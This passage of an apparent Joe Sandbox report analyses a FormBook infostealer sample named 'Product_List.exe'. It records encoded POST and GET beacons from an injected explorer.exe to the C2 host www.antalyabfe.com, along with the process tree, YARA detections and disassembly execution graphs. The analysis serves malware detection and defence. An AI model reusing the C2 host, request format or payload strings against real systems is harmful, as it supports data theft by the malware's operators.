                                                    May 19, 2023 17:51:46.270509958 CEST48OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.antalyabfe.com
                                                    Connection: close
                                                    Content-Length: 189
                                                    Cache-Control: no-cache
                                                    Origin: http://www.antalyabfe.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.antalyabfe.com/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 55 78 65 79 5f 6c 56 4d 76 56 4d 65 50 50 62 72 54 7a 62 44 70 48 4e 52 6b 76 52 76 30 79 37 68 79 6f 4c 50 4d 76 2d 6b 72 5a 55 30 54 76 6f 59 66 4a 68 73 75 66 71 7a 36 38 4e 4f 49 37 4a 72 53 64 2d 66 59 45 77 4f 51 4d 56 64 39 57 45 53 74 75 4d 34 70 6a 6d 63 44 36 35 5a 75 49 69 66 55 44 36 47 72 77 56 67 48 4b 36 52 31 79 74 65 66 51 36 50 34 4d 39 7e 34 56 6f 41 36 56 6b 42 31 70 41 32 63 61 67 47 6f 71 79 37 6a 4c 2d 6f 5a 72 37 45 42 62 44 79 6a 37 41 70 78 45 48 71 6c 69 71 6c 77 29 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: 8mBWmPn=8GpXORSvCn1_kUxey_lVMvVMePPbrTzbDpHNRkvRv0y7hyoLPMv-krZU0TvoYfJhsufqz68NOI7JrSd-fYEwOQMVd9WEStuM4pjmcD65ZuIifUD6GrwVgHK6R1ytefQ6P4M9~4VoA6VkB1pA2cagGoqy7jL-oZr7EBbDyj7ApxEHqliqlw).
                                                    May 19, 2023 17:51:46.299638033 CEST49INHTTP/1.1 301 Moved Permanently
                                                    Date: Fri, 19 May 2023 15:51:46 GMT
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=3600
                                                    Expires: Fri, 19 May 2023 16:51:46 GMT
                                                    Location: https://www.antalyabfe.com/bpg5/
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CaUjmW8Gk5Azu5FAR9sof9TnvauwTnlYTgPt6rsljOLTkNJnU0hmLA0C2CYOfLXD7R4sLoJCcYf5haqI6xpH%2FAQgYXbnUao%2Bby0EdoaztQq5jNfRnXWQ48zh0aWPPCUzaiS34AU%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Vary: Accept-Encoding
                                                    Server: cloudflare
                                                    CF-RAY: 7c9d80d22edd9a21-FRA
                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    9192.168.2.449706188.114.97.780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:48.816206932 CEST50OUTGET /bpg5/?8mBWmPn=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&JBfKk=_uLb4J-vJhW8 HTTP/1.1
                                                    Host: www.antalyabfe.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 19, 2023 17:51:48.844038963 CEST51INHTTP/1.1 301 Moved Permanently
                                                    Date: Fri, 19 May 2023 15:51:48 GMT
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=3600
                                                    Expires: Fri, 19 May 2023 16:51:48 GMT
                                                    Location: https://www.antalyabfe.com/bpg5/?8mBWmPn=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&JBfKk=_uLb4J-vJhW8
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lP5ycNZZvM%2BFxS7g1RyF3NaRh5gtfwpt7WsWwrm53eISkljnIv3RnSZ78SdPtlKwpvcmWWJ9J2LiUVtWuDftf%2BK7WxfBVIk1jVr3potMA308a%2B0fmtZ7ZGHndHR4EsoT2%2BOMec4%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 7c9d80e21c57047e-FRA
                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:17:50:21
                                                    Start date:19/05/2023
                                                    Path:C:\Users\user\Desktop\Product_List.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\Product_List.exe
                                                    Imagebase:0x890000
                                                    File size:961536 bytes
                                                    MD5 hash:99A12CE4A1C70EF4268D828B018BCBF6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:low

                                                    General

                                                    Target ID:2
                                                    Start time:17:50:35
                                                    Start date:19/05/2023
                                                    Path:C:\Users\user\Desktop\Product_List.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\Product_List.exe
                                                    Imagebase:0x280000
                                                    File size:961536 bytes
                                                    MD5 hash:99A12CE4A1C70EF4268D828B018BCBF6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low

                                                    General

                                                    Target ID:3
                                                    Start time:17:50:36
                                                    Start date:19/05/2023
                                                    Path:C:\Users\user\Desktop\Product_List.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\Product_List.exe
                                                    Imagebase:0xc70000
                                                    File size:961536 bytes
                                                    MD5 hash:99A12CE4A1C70EF4268D828B018BCBF6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:low

                                                    General

                                                    Target ID:4
                                                    Start time:17:50:41
                                                    Start date:19/05/2023
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff618f60000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:5
                                                    Start time:17:50:52
                                                    Start date:19/05/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\cmd.exe
                                                    Imagebase:0xd90000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:high

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:23.2%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:5
                                                      Total number of Limit Nodes:2
                                                      execution_graph 2419 9f07f30 2420 9f080bb 2419->2420 2421 9f07f56 2419->2421 2421->2420 2423 9f081b0 PostMessageW 2421->2423 2424 9f0821c 2423->2424 2424->2421

                                                      Executed Functions

                                                      Function 09F069E8 Relevance: 1.9, Strings: 1, Instructions: 662COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 9f069e8-9f06a19 1 9f06a20-9f075d2 0->1 2 9f06a1b 0->2 4 9f06ac8-9f06bf3 1->4 5 9f075d8-9f075df 1->5 2->1 13 9f06bf5-9f06c10 4->13 14 9f06c1b-9f06cb1 4->14 13->14 22 9f06cb3 14->22 23 9f06cb8-9f06cfa 14->23 22->23 26 9f06d63-9f06d9e 23->26 27 9f06cfc-9f06d12 23->27 30 9f06da0-9f06dbb 26->30 31 9f06dc6 26->31 28 9f06d17-9f06d37 27->28 32 9f06d39-9f06d54 28->32 33 9f06d5f-9f06d61 28->33 30->31 34 9f06dc7-9f06dd1 31->34 32->33 33->34 36 9f06dd3 34->36 37 9f06dd8-9f06e28 34->37 36->37 42 9f06e50-9f06e69 37->42 43 9f06e2a-9f06e45 37->43 44 9f06ec7-9f06f7c 42->44 45 9f06e6b-9f06e9f 42->45 43->42 57 9f06fa4-9f06fe5 44->57 58 9f06f7e-9f06f99 44->58 45->44 50 9f06ea1-9f06ebc 45->50 50->44 61 9f06fe7-9f07002 57->61 62 9f0700d-9f07058 57->62 58->57 61->62 68 9f071f7-9f07213 62->68 69 9f07219-9f07298 68->69 70 9f0705d-9f07123 68->70 77 9f072c0-9f07309 69->77 78 9f0729a-9f072b5 69->78 88 9f07129-9f0719e 70->88 89 9f071ec-9f071f1 70->89 86 9f07311-9f07324 77->86 87 9f0730b-9f0730e 77->87 78->77 90 9f07326 86->90 91 9f0732b-9f0736c 86->91 87->86 98 9f071a3-9f071c3 88->98 89->68 90->91 96 9f073d5-9f07410 91->96 97 9f0736e-9f07384 91->97 103 9f07412-9f0742d 96->103 104 9f07438 96->104 102 9f07389-9f073a9 97->102 100 9f071c5-9f071e0 98->100 101 9f071eb 98->101 100->101 101->89 105 9f073d1-9f073d3 102->105 106 9f073ab-9f073c6 102->106 103->104 108 9f07439-9f07448 104->108 105->108 106->105 112 9f0744d-9f0746d 108->112 114 9f07495-9f074af 112->114 115 9f0746f-9f0748a 112->115 117 9f074b1-9f07502 114->117 118 9f07503-9f075b6 114->118 115->114 117->118 118->5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.595876096.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_9f00000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (
                                                      • API String ID: 0-3887548279
                                                      • Opcode ID: 6891ed9bcd06a1ed8c9fe8cf62e1855216c53b7718286a5cda076af742dae97a
                                                      • Instruction ID: 914308e3fde8ea27df922ea2af87aa49326d7f4c91cf634550c5d58bbd282caf
                                                      • Opcode Fuzzy Hash: 6891ed9bcd06a1ed8c9fe8cf62e1855216c53b7718286a5cda076af742dae97a
                                                      • Instruction Fuzzy Hash: C762E275A01228CFDB64DF68C854BEDBBB2BF89304F5081E9D409AB295DB346E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 09F081B0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 125 9f081b0-9f0821a PostMessageW 126 9f08223-9f08237 125->126 127 9f0821c-9f08222 125->127 127->126
                                                      APIs
                                                      • PostMessageW.USER32(?,?,?,?), ref: 09F0820D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.595876096.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_9f00000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 6845577674568538b74d4ed279f41991b3fc89c9edda74c98cdfe90aab0daf2d
                                                      • Instruction ID: 5d37afbb539c05652ca362b54e1a177731f954594312c4ddf4f1d09e6f3f9e43
                                                      • Opcode Fuzzy Hash: 6845577674568538b74d4ed279f41991b3fc89c9edda74c98cdfe90aab0daf2d
                                                      • Instruction Fuzzy Hash: 171115B58007089FCB20CF9AD988BDEBBF8EB58324F10841AE558A3640C379A544CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 09F09548 Relevance: .4, Instructions: 359COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.595876096.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_9f00000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd4188c5f74cd9763fcfbeb75759138c02c4de9f78d4c0d1c4d2f69fd00115a4
                                                      • Instruction ID: 13f90eb592790424a9f424f552597c2206e8c99a8801f006fbae1a88c9db14aa
                                                      • Opcode Fuzzy Hash: bd4188c5f74cd9763fcfbeb75759138c02c4de9f78d4c0d1c4d2f69fd00115a4
                                                      • Instruction Fuzzy Hash: 8CD19E31B006008BDB1AEB75C8607AE77EAAFC9700F14846DE546CB3D2EEB9D941DB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 09F00011 Relevance: .1, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.595876096.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_9f00000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 37b42eb73f608704c3308443cdce6e8f6488909a87de6758f64247197fafa5a4
                                                      • Instruction ID: b3bd41c01745876eefb26346f2d2089c654ccc33605521477f2d327e2a316ad2
                                                      • Opcode Fuzzy Hash: 37b42eb73f608704c3308443cdce6e8f6488909a87de6758f64247197fafa5a4
                                                      • Instruction Fuzzy Hash: E3412D71D05B588BEB1DCF6B9D5479AFAF3AFC5201F18C1BA980CAA265DB3406428F11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 09F00040 Relevance: .1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.595876096.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_9f00000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8670de8dcd60d98692c91d9b1bbbd6d0284ba6c34dc4a87c19b19f0d084256fd
                                                      • Instruction ID: 50becfdf711458680620ddb93c6ee63bf79a32e8d964806d93d967677f36d20a
                                                      • Opcode Fuzzy Hash: 8670de8dcd60d98692c91d9b1bbbd6d0284ba6c34dc4a87c19b19f0d084256fd
                                                      • Instruction Fuzzy Hash: 85412371E05A588BEB1CCF6BDD4479AFAF7BFC9301F04D1B6950CAA255EB7016418E01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 09F069D9 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.595876096.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_9f00000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8048f546192f6afa1556858ee556e4bbc09135e26d2f841c453df0a629f509e6
                                                      • Instruction ID: c90c9c892885f2ed82f39b4ccec856743ed3e7da121bad68868d2115eb3831e8
                                                      • Opcode Fuzzy Hash: 8048f546192f6afa1556858ee556e4bbc09135e26d2f841c453df0a629f509e6
                                                      • Instruction Fuzzy Hash: 2931CC71E056288BEB28DF6BD8153DAFAF7AFC5314F04C1AAD90CA6254DB740A858F41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:4.7%
                                                      Dynamic/Decrypted Code Coverage:2.5%
                                                      Signature Coverage:4.6%
                                                      Total number of Nodes:679
                                                      Total number of Limit Nodes:84
                                                      execution_graph 26765 4200a3 26768 41e783 26765->26768 26773 41f1b3 26768->26773 26770 41e79f 26777 17a9a00 LdrInitializeThunk 26770->26777 26771 41e7ba 26774 41f238 26773->26774 26776 41f1c2 26773->26776 26774->26770 26776->26774 26778 4195b3 26776->26778 26777->26771 26779 4195cd 26778->26779 26782 4195c1 26778->26782 26779->26774 26781 41971f 26781->26774 26782->26779 26783 419a33 LdrLoadDll 26782->26783 26783->26781 26784 40b4c3 26785 40b4e8 26784->26785 26790 40cf03 26785->26790 26789 40b540 26791 40cf27 26790->26791 26792 40cf63 LdrLoadDll 26791->26792 26793 40b51b 26791->26793 26792->26793 26793->26789 26794 40eac3 26793->26794 26795 40eaef 26794->26795 26805 41e3e3 26795->26805 26798 40eb0f 26798->26789 26800 40eb32 26800->26798 26817 41ea13 LdrLoadDll 26800->26817 26802 40eb4a 26818 41e693 26802->26818 26804 40eb6d 26804->26789 26806 41f1b3 LdrLoadDll 26805->26806 26807 40eb08 26806->26807 26807->26798 26808 41e423 26807->26808 26809 41e43f 26808->26809 26810 41f1b3 LdrLoadDll 26808->26810 26821 17a9710 LdrInitializeThunk 26809->26821 26810->26809 26811 41e45a 26811->26800 26812 41f1b3 LdrLoadDll 26811->26812 26813 41e47f 26812->26813 26822 17a9910 LdrInitializeThunk 26813->26822 26814 41e49e 26814->26800 26817->26802 26819 41e6af NtClose 26818->26819 26820 41f1b3 LdrLoadDll 26818->26820 26819->26804 26820->26819 26821->26811 26822->26814 26823 401664 26824 401691 26823->26824 26828 4233a3 26824->26828 26831 42339f 26824->26831 26825 4017a6 26835 41fbe3 26828->26835 26832 4233a3 26831->26832 26833 41fbe3 22 API calls 26832->26833 26834 4233ae 26833->26834 26834->26825 26836 41fc09 26835->26836 26849 40be93 26836->26849 26838 41fc15 26848 41fc79 26838->26848 26857 410083 26838->26857 26840 41fc34 26841 41fc47 26840->26841 26869 410043 26840->26869 26844 41fc5c 26841->26844 26878 41e8b3 26841->26878 26874 403513 26844->26874 26846 41fc6b 26847 41e8b3 2 API calls 26846->26847 26847->26848 26848->26825 26850 40bea0 26849->26850 26881 40bde3 26849->26881 26852 40bea7 26850->26852 26893 40bd83 26850->26893 26852->26838 26858 4100af 26857->26858 27288 40d3d3 26858->27288 26860 4100c1 27292 40ff53 26860->27292 26863 4100dc 26865 41e693 2 API calls 26863->26865 26866 4100e7 26863->26866 26864 4100f4 26867 41e693 2 API calls 26864->26867 26868 410105 26864->26868 26865->26866 26866->26840 26867->26868 26868->26840 26870 4195b3 LdrLoadDll 26869->26870 26871 410062 26870->26871 26872 410069 26871->26872 26873 41006b GetUserGeoID 26871->26873 26872->26841 26873->26841 26875 403550 26874->26875 26877 403577 26875->26877 27311 40dd63 26875->27311 26877->26846 26879 41f1b3 LdrLoadDll 26878->26879 26880 41e8d2 ExitProcess 26879->26880 26880->26844 26882 40bdf6 26881->26882 26932 41ce53 LdrLoadDll 26881->26932 26912 41cd23 26882->26912 26885 40be09 26885->26850 26886 40bdff 26886->26885 26915 41f533 26886->26915 26888 40be46 26888->26885 26926 40bc23 26888->26926 26890 40be66 26933 40b683 LdrLoadDll 26890->26933 26892 40be78 26892->26850 26894 40bda0 26893->26894 26895 41f823 LdrLoadDll 26893->26895 27269 41f823 26894->27269 26895->26894 26898 41f823 LdrLoadDll 26899 40bdcd 26898->26899 26900 40fe43 26899->26900 26901 40fe5c 26900->26901 27273 40d253 26901->27273 26903 40fe6f 26904 41e3e3 LdrLoadDll 26903->26904 26905 40fe7e 26904->26905 26906 40beb8 26905->26906 27277 41e9d3 26905->27277 26906->26838 26908 40fe95 26909 40fec0 26908->26909 27280 41e463 26908->27280 26910 41e693 2 API calls 26909->26910 26910->26906 26913 41cd38 26912->26913 26934 41e803 LdrLoadDll 26912->26934 26913->26886 26916 41f54c 26915->26916 26935 4191a3 26916->26935 26918 41f564 26919 41f56d 26918->26919 26974 41f373 26918->26974 26919->26888 26921 41f581 26921->26919 26991 41e103 26921->26991 26923 41f5b5 26996 4200e3 26923->26996 27247 409423 26926->27247 26928 40bc44 26928->26890 26929 40bc3d 26929->26928 27260 4096e3 26929->27260 26932->26882 26933->26892 26934->26913 26936 4194e6 26935->26936 26946 4191b7 26935->26946 26936->26918 26939 4192e8 27002 41e563 26939->27002 26940 4192cb 27059 41e663 LdrLoadDll 26940->27059 26943 4192d5 26943->26918 26944 41930f 26945 4200e3 2 API calls 26944->26945 26947 41931b 26945->26947 26946->26936 26999 41de53 26946->26999 26947->26943 26948 4194aa 26947->26948 26949 4194c0 26947->26949 26954 4193b3 26947->26954 26950 41e693 2 API calls 26948->26950 27065 418ec3 LdrLoadDll NtReadFile NtClose 26949->27065 26952 4194b1 26950->26952 26952->26918 26953 4194d3 26953->26918 26955 41941a 26954->26955 26956 4193c2 26954->26956 26955->26948 26957 41942d 26955->26957 26958 4193c7 26956->26958 26959 4193db 26956->26959 27061 41e4e3 26957->27061 27060 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 26958->27060 26963 4193e0 26959->26963 26964 4193f8 26959->26964 27005 418e23 26963->27005 26964->26952 27017 418b43 26964->27017 26966 4193d1 26966->26918 26968 41948d 26971 41e693 2 API calls 26968->26971 26969 4193ee 26969->26918 26973 419499 26971->26973 26972 419410 26972->26918 26973->26918 26976 41f38e 26974->26976 26975 41f3a0 26975->26921 26976->26975 27083 420063 26976->27083 26978 41f3c0 27086 4187a3 26978->27086 26980 41f3e3 26980->26975 26981 4187a3 3 API calls 26980->26981 26984 41f405 26981->26984 26983 41f48d 26985 41f49d 26983->26985 27213 41f133 LdrLoadDll 26983->27213 26984->26975 27118 419b03 26984->27118 27129 41efa3 26985->27129 26988 41f4cb 27208 41e0c3 26988->27208 26990 41f4f5 26990->26921 26992 41f1b3 LdrLoadDll 26991->26992 26993 41e11f 26992->26993 27241 17a967a 26993->27241 26994 41e13a 26994->26923 26997 41f5df 26996->26997 27244 41e873 26996->27244 26997->26888 27000 41f1b3 LdrLoadDll 26999->27000 27001 41929c 27000->27001 27001->26939 27001->26940 27001->26943 27003 41f1b3 LdrLoadDll 27002->27003 27004 41e57f NtCreateFile 27003->27004 27004->26944 27006 418e3f 27005->27006 27007 41e4e3 LdrLoadDll 27006->27007 27008 418e60 27007->27008 27009 418e67 27008->27009 27010 418e7b 27008->27010 27011 41e693 2 API calls 27009->27011 27012 41e693 2 API calls 27010->27012 27013 418e70 27011->27013 27014 418e84 27012->27014 27013->26969 27066 420203 LdrLoadDll RtlAllocateHeap 27014->27066 27016 418e8f 27016->26969 27018 418bc1 27017->27018 27019 418b8e 27017->27019 27021 418d0c 27018->27021 27025 418bdd 27018->27025 27020 41e4e3 LdrLoadDll 27019->27020 27022 418ba9 27020->27022 27023 41e4e3 LdrLoadDll 27021->27023 27024 41e693 2 API calls 27022->27024 27031 418d27 27023->27031 27026 418bb2 27024->27026 27027 41e4e3 LdrLoadDll 27025->27027 27026->26972 27028 418bf8 27027->27028 27029 418c14 27028->27029 27030 418bff 27028->27030 27035 418c19 27029->27035 27036 418c2f 27029->27036 27034 41e693 2 API calls 27030->27034 27079 41e523 LdrLoadDll 27031->27079 27033 418d61 27037 41e693 2 API calls 27033->27037 27038 418c08 27034->27038 27039 41e693 2 API calls 27035->27039 27046 418c34 27036->27046 27067 4201c3 27036->27067 27040 418d6c 27037->27040 27038->26972 27041 418c22 27039->27041 27040->26972 27041->26972 27042 418c46 27042->26972 27045 418c9a 27050 418cb1 27045->27050 27078 41e4a3 LdrLoadDll 27045->27078 27046->27042 27070 41e613 27046->27070 27048 418cb8 27051 41e693 2 API calls 27048->27051 27049 418ccd 27052 41e693 2 API calls 27049->27052 27050->27048 27050->27049 27051->27042 27053 418cd6 27052->27053 27054 418d02 27053->27054 27073 41fee3 27053->27073 27054->26972 27056 418ced 27057 4200e3 2 API calls 27056->27057 27058 418cf6 27057->27058 27058->26972 27059->26943 27060->26966 27062 419475 27061->27062 27063 41f1b3 LdrLoadDll 27061->27063 27064 41e523 LdrLoadDll 27062->27064 27063->27062 27064->26968 27065->26953 27066->27016 27080 41e833 27067->27080 27069 4201db 27069->27046 27071 41f1b3 LdrLoadDll 27070->27071 27072 41e62f NtReadFile 27071->27072 27072->27045 27074 41fef0 27073->27074 27075 41ff07 27073->27075 27074->27075 27076 4201c3 2 API calls 27074->27076 27075->27056 27077 41ff1e 27076->27077 27077->27056 27078->27050 27079->27033 27081 41f1b3 LdrLoadDll 27080->27081 27082 41e84f RtlAllocateHeap 27081->27082 27082->27069 27084 420090 27083->27084 27214 41e743 27083->27214 27084->26978 27087 4187b4 27086->27087 27089 4187bc 27086->27089 27087->26980 27088 418a8f 27088->26980 27089->27088 27217 421263 27089->27217 27091 418810 27092 421263 2 API calls 27091->27092 27096 41881b 27092->27096 27093 418869 27095 421263 2 API calls 27093->27095 27099 41887d 27095->27099 27096->27093 27097 421393 3 API calls 27096->27097 27228 421303 LdrLoadDll RtlAllocateHeap RtlFreeHeap 27096->27228 27097->27096 27098 4188da 27100 421263 2 API calls 27098->27100 27099->27098 27222 421393 27099->27222 27101 4188f0 27100->27101 27103 41892d 27101->27103 27105 421393 3 API calls 27101->27105 27104 421263 2 API calls 27103->27104 27106 418938 27104->27106 27105->27101 27107 421393 3 API calls 27106->27107 27114 418972 27106->27114 27107->27106 27109 418a67 27230 4212c3 LdrLoadDll RtlFreeHeap 27109->27230 27111 418a71 27231 4212c3 LdrLoadDll RtlFreeHeap 27111->27231 27113 418a7b 27232 4212c3 LdrLoadDll RtlFreeHeap 27113->27232 27229 4212c3 LdrLoadDll RtlFreeHeap 27114->27229 27116 418a85 27233 4212c3 LdrLoadDll RtlFreeHeap 27116->27233 27119 419b14 27118->27119 27120 4191a3 8 API calls 27119->27120 27125 419b2a 27120->27125 27121 419b33 27121->26983 27122 419b67 27123 4200e3 2 API calls 27122->27123 27124 419b78 27123->27124 27124->26983 27125->27121 27125->27122 27126 419bb3 27125->27126 27127 4200e3 2 API calls 27126->27127 27128 419bb8 27127->27128 27128->26983 27130 41efb7 27129->27130 27131 41ee33 LdrLoadDll 27129->27131 27234 41ee33 27130->27234 27131->27130 27133 41efc0 